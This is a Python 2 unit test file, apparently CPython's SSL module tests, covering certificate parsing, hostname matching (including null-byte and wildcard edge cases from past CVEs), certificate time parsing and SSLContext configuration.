source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
